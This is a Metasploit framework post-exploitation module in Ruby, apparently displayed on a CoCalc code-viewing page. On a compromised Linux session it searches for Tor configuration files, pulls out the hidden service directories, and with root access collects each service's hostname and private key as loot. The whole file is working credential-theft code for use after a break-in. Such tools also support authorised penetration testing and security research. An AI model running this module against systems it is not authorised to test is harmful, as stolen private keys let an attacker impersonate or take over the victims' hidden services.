CoCalc -- tor_hiddenservices.rb

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/linux/gather/tor_hiddenservices.rb
¹⁹⁵⁹¹ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
# Adapted from post/linux/gather/enum_configs.rb
6
##
7

8
class MetasploitModule < Msf::Post
9

10
  include Msf::Post::Linux::System
11
  include Msf::Post::Linux::Priv
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'Linux Gather TOR Hidden Services',
18
        'Description' => %q{
19
          This module collects the hostnames name and private keys of
20
          any TOR Hidden Services running on the target machine. It
21
          will search for torrc and if found, will parse it for the
22
          directories of Hidden Services. However, root permissions
23
          are required to read them as they are owned by the user that
24
          TOR runs as, usually a separate account.
25
        },
26
        'License' => MSF_LICENSE,
27
        'Author' => [
28
          'Harvey Phillips <xcellerator[at]gmx.com>',
29
        ],
30
        'Platform' => ['linux'],
31
        'SessionTypes' => ['shell', 'meterpreter'],
32
        'Notes' => {
33
          'Stability' => [CRASH_SAFE],
34
          'SideEffects' => [],
35
          'Reliability' => []
36
        }
37
      )
38
    )
39
  end
40

41
  def run
42
    print_status("Running module against #{get_hostname} (#{session.session_host})")
43

44
    distro = get_sysinfo
45
    print_status('Info:')
46
    print_status("\t#{distro[:version]}")
47
    print_status("\t#{distro[:kernel]}")
48
    print_status('Looking for torrc...')
49
    find_torrc
50
  end
51

52
  def save(file, data, ltype, ctype = 'text/plain')
53
    fname = ::File.basename(file)
54
    loot = store_loot(ltype, ctype, session, data, fname)
55
    print_status("#{fname} stored in #{loot}")
56
  end
57

58
  def find_torrc
59
    fail_with(Failure::BadConfig, "'locate' command does not exist") unless command_exists?('locate')
60

61
    config = cmd_exec("locate 'torrc' | grep -v 'torrc.5.gz'").split("\n")
62
    if config.empty?
63
      print_error('No torrc file found, maybe it goes by a different name?')
64
      return
65
    end
66

67
    hidden = Array.new
68
    # For every torrc file found, parse them for HiddenServiceDir
69
    config.each do |c|
70
      print_good("Torrc file found at #{c}")
71
      services = cmd_exec("cat #{c} | grep HiddenServiceDir | grep -v '#' | cut -d ' ' -f 2").split("\n")
72
      # For each HiddenServiceDir found in the torrc(s), push them to the hidden array
73
      services.each do |s|
74
        hidden.push(s)
75
      end
76
    end
77

78
    # Remove any duplicate entries
79
    hidden = hidden.uniq
80

81
    # If hidden is empty, then no Hidden Services are running.
82
    if hidden.empty?
83
      print_bad('No hidden services were found!')
84
      return
85
    end
86

87
    print_good("#{hidden.length} hidden services have been found!")
88

89
    unless is_root?
90
      print_error('Hidden Services were found, but we need root to access the directories')
91
      return
92
    end
93

94
    # For all the Hidden Services found, loot hostname and private_key file
95
    hidden.each do |f|
96
      output = read_file("#{f}hostname")
97
      save(f, output, "tor.#{f.split('/')[-1]}.hostname") if output && output !~ /No such file or directory/
98
      output = read_file("#{f}private_key")
99
      save(f, output, "tor.#{f.split('/')[-1]}.privatekey") if output && output !~ /No such file or directory/
100
    end
101
  end
102
end
103

104
Product

Resources

Company
